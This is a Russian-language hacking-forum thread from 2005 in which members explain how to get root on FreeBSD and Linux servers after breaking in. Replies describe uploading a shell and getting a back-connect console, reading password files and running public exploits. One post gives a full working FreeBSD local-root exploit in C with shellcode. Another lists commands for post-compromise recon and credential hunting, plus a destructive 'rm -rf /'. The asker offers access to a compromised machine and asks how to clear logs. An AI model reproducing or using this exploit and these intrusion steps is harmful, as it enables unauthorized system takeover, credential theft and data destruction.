HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > *nix
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Помогите Взять root.
  #1  
Старый 12.11.2005, 13:01
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
С нами: 10838960

Репутация: -4
Question Помогите Взять root.

Короче как брать рута на Фряхе Линюксе...
Опишите все по шажкам... Что в первую очередь надо посмотреть где могут быть пароли в часности интрересует ssh.

БольшОЕ Спасибо Прозьба тем кто не знает не писать.!
 

  #2  
Старый 12.11.2005, 14:02
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию

так так=) отвечаю все подробно...
сначала заливаешь шелл , потом пробиваешь к консоли (бек коннект, бинд) после того как пробился к консоли то есть ты уже в системе набираешь uname -a если линуха + кернел НЕ 2005 то можно попробывать взять паблик сплойтами которые лежат web-hack.ru/exploit , а перед всем этим не забываем проверять на наличие компилятора и качалок (which wget curl lynx fetch links get, which gcc cc) вот так.. а пассы от SSH бывают в /etc/shadow на всякий случай можешь попробвать как зашел в систему cat /etc/shadow но это далеко не каждый раз случается=) так что качаешь сплойты с сайта компилишь запускаешь.. чего непонятно спрашивай не стесняйся!))
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #3  
Старый 12.11.2005, 15:30
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

ухахаха ))))))))))))))
Цитата:
/etc/shadow
Это в линуксе, в фряхе master.passwd насколько я помню))
Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно...
Бывает часто плохо права выставленны...
 

  #4  
Старый 14.04.2006, 07:54
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
С нами: 10669286

Репутация: 319


По умолчанию

Цитата:
Сообщение от qBiN  
ухахаха ))))))))))))))
Это в линуксе, в фряхе master.passwd насколько я помню))
Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно...
Бывает часто плохо права выставленны...
Хех,ты забыл про один бронебойный сплойт.
Кому надо...Сплойт рабочий,бага актуальна....
Код:
/*
FreeBSD 4.3 local root exploit using shared signals.
Written by Georgi Guninski http://www.guninski.com
*/

#include <stdio.h>
#include <signal.h>
#include <unistd.h>
int vv1;

#define MYSIG SIGINT


//exec "/tmp/sh", shellcode gotten from the internet and modified
unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
                  "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
                  "\xb0\x3b\x50\xcd\x80\x90\x90\x90";

typedef (*PROG)();
extern char **environ;

int main(int ac,char **av)
{
int pid;
//(*(PROG)bsdshell)();
if(!(vv1=getenv("vv")))
 {
  setenv("vv",bsdshell,1);
  if(!execle(av[0],"vv",NULL,environ))
   {
    perror("weird exec");
    exit(1);
   }
 }

printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);

if(!(pid=rfork(RFPROC|RFSIGSHARE)))
 {
  printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
//  if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
  if(!execl("/usr/bin/login","login",0))
   {
    perror("exec setuid failed");
    exit(2);
   };
 }
sleep(2);
signal(MYSIG,(sig_t)vv1);
sleep(2);
kill(pid,MYSIG);
printf("done\n");
while(42);
}
 

  #5  
Старый 12.11.2005, 15:39
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
С нами: 10838960

Репутация: -4
По умолчанию

Еще как бы в развитие темы первой командой ИМХо жолжна быть who
 

  #6  
Старый 12.11.2005, 19:57
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
С нами: 11442626

Репутация: 1635


По умолчанию

Ещё неплохо поискать config.inc.php очень часто пароль на мускул и ssh совпадают.
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 

  #7  
Старый 12.11.2005, 21:38
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию

qBiN у мя например такое было=))
Цитата:
Сообщение от w4rd3n  
Еще как бы в развитие темы первой командой ИМХо жолжна быть who
ну это рута не касается... это для соблюдения безопасности=)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #8  
Старый 12.11.2005, 22:22
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
С нами: 10838960

Репутация: -4
По умолчанию

Народ кто готов Дайю шалл ip:порт вы снимаете видео по поиску всего что описали...
Исход не имееть значения.... как вам? кто готов в асю 30003111
 

===============
  #9  
Старый 13.11.2005, 00:00
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
С нами: 10838960

Репутация: -4
По умолчанию ===============

Вообщем вы мне нечего нового не сказали...

Вот собственно мои знания...

$pwd;id;ls -la
$who
$uname -a
$which gcc
$which wget
$which lynx
$which fetch
$ps -ax

$find / -type f -perm -04000 -ls
// поиск файлов с sqid битом
$find / -type f -name "config*" //поиск по маске всех файлов с именем config*(манипулиренм названиями.
$find . -type f -name "config*" тоже самое токо ищем директории.
$find / -type f -name .htpasswd // без коментариев.
$find / -type f -name .bash_history // ищем историю bash оболочки.
$netstat -an | grep -i listen // без коментариев.
$find / -type d -perm 0777 //ищем папки с правами на запись.
$sysctl -a | grep version // более точный способ определения OS
$cat /proc/version // Версия ядра.
$cat /etc/syslog.conf // смотрим syslog
$cat /etc/hosts // смотрим виртуальные хосты.
$locate httpd.conf // без коментариев.
$cd /; rm -rf //

Вот собственно все что хотел вам сказать...
Меня еще интересует вопросы

1)Что делать с фалами которые имеют sqid биты?
2)Где еще могу быть пароли ваши линей взлома.
3)Еще команды блоки команд.
4)Да еще чистка логов...

Вообщем меня интересует взлом системы без применения сплойтов.

Последний раз редактировалось w4rd3n; 13.11.2005 в 00:04..
 

  #10  
Старый 13.11.2005, 06:08
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

хихихихи)))
Ты что копировал из-какого нить шелла с алиасами?
Нах тебе искать то что ты не понимаешь:?:
sqid suid биты например. Вопще поставь себе линукс,мож выучиешь что-нибуть))))
sqid suid-права файла выполняться от прав рута они чем-то отличаются только хз чем
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...